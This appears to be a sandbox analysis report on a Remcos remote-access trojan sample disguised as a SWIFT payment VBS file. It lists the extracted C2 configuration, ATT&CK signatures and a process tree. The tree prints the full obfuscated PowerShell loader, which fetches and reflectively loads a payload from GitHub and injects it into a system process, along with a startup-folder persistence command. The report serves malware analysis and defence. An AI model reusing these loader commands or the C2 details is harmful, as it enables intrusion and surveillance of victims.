remcos | df610fe1800c5c643599d46f147e0e0623b5523e54e3b0795f2e4e2be88ba952

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04/10/2024, 09:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SWIFT 103 202406111301435660 110624-pdf.vbs
Size

489KB
MD5

b4ed8d97bb9132e15502eb005580d3e1
SHA1

eb64b5bfbb04979d46b7f906394caadbe96e5c4f
SHA256

df610fe1800c5c643599d46f147e0e0623b5523e54e3b0795f2e4e2be88ba952
SHA512

d6446d9a7120f2460216c24ee92045d3a435d8987f38375bbae41a66022a03147b40b42174a838be0b73019147fe83e30708267cbc83f44199895a486f746e85
SSDEEP

12288:+IM9DK7pKt0qbfzQ0mfRygWqa8kPDXwlvX+LHqDDuu++MZu+Df2OW6:+ImrsHflxw5

Score

10^/10

remcos octobers discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

OCTOBERS

ab9001.ddns.net:23782

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
VLC.exe
copy_folder
VLC
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Chrorne-K04X5E
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Rmc
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 2 IoCs

flow	pid	Process
23	4900	powershell.exe
27	4900	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5080	powershell.exe
2648	powershell.exe
4900	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wernerite.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wernerite.vbs	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	raw.githubusercontent.com
23	raw.githubusercontent.com

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4900 set thread context of 2600	4900	powershell.exe	96
PID 2600 set thread context of 856	2600	AddInProcess32.exe	97
PID 2600 set thread context of 2560	2600	AddInProcess32.exe	122
PID 2600 set thread context of 5632	2600	AddInProcess32.exe	133
PID 2600 set thread context of 5848	2600	AddInProcess32.exe	143
PID 2600 set thread context of 5688	2600	AddInProcess32.exe	153
PID 2600 set thread context of 2316	2600	AddInProcess32.exe	163
PID 2600 set thread context of 2008	2600	AddInProcess32.exe	173
PID 2600 set thread context of 184	2600	AddInProcess32.exe	184

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4460	cmd.exe
2348	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2348	PING.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
5080	powershell.exe
5080	powershell.exe
2648	powershell.exe
2648	powershell.exe
4900	powershell.exe
4900	powershell.exe
4216	msedge.exe
4216	msedge.exe
824	msedge.exe
824	msedge.exe
4684	identity_helper.exe
4684	identity_helper.exe
464	msedge.exe
464	msedge.exe
464	msedge.exe
464	msedge.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
2600	AddInProcess32.exe
2600	AddInProcess32.exe
2600	AddInProcess32.exe
2600	AddInProcess32.exe
2600	AddInProcess32.exe
2600	AddInProcess32.exe
2600	AddInProcess32.exe
2600	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs

pid	Process
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	4900	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe
824	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2600	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4824 wrote to memory of 4460	4824	WScript.exe	82
PID 4824 wrote to memory of 4460	4824	WScript.exe	82
PID 4460 wrote to memory of 2348	4460	cmd.exe	84
PID 4460 wrote to memory of 2348	4460	cmd.exe	84
PID 4460 wrote to memory of 5080	4460	cmd.exe	89
PID 4460 wrote to memory of 5080	4460	cmd.exe	89
PID 4824 wrote to memory of 2648	4824	WScript.exe	90
PID 4824 wrote to memory of 2648	4824	WScript.exe	90
PID 2648 wrote to memory of 4900	2648	powershell.exe	93
PID 2648 wrote to memory of 4900	2648	powershell.exe	93
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 4900 wrote to memory of 2600	4900	powershell.exe	96
PID 2600 wrote to memory of 856	2600	AddInProcess32.exe	97
PID 2600 wrote to memory of 856	2600	AddInProcess32.exe	97
PID 2600 wrote to memory of 856	2600	AddInProcess32.exe	97
PID 2600 wrote to memory of 856	2600	AddInProcess32.exe	97
PID 856 wrote to memory of 824	856	svchost.exe	99
PID 856 wrote to memory of 824	856	svchost.exe	99
PID 824 wrote to memory of 1824	824	msedge.exe	100
PID 824 wrote to memory of 1824	824	msedge.exe	100
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101
PID 824 wrote to memory of 4236	824	msedge.exe	101

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202406111301435660 110624-pdf.vbs"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4900
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2600
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:1824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
        7⤵
        
        PID:4236
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
        7⤵
        
        PID:4480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
        7⤵
        
        PID:2492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        7⤵
        
        PID:3700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
        7⤵
        
        PID:5052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
        7⤵
        
        PID:2588
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4684
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
        7⤵
        
        PID:936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
        7⤵
        
        PID:448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
        7⤵
        
        PID:4900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
        7⤵
        
        PID:1240
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
        7⤵
        
        PID:2308
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
        7⤵
        
        PID:2164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
        7⤵
        
        PID:4900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
        7⤵
        
        PID:5172
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
        7⤵
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
        7⤵
        
        PID:5816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
        7⤵
        
        PID:5192
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2228 /prefetch:1
        7⤵
        
        PID:4576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
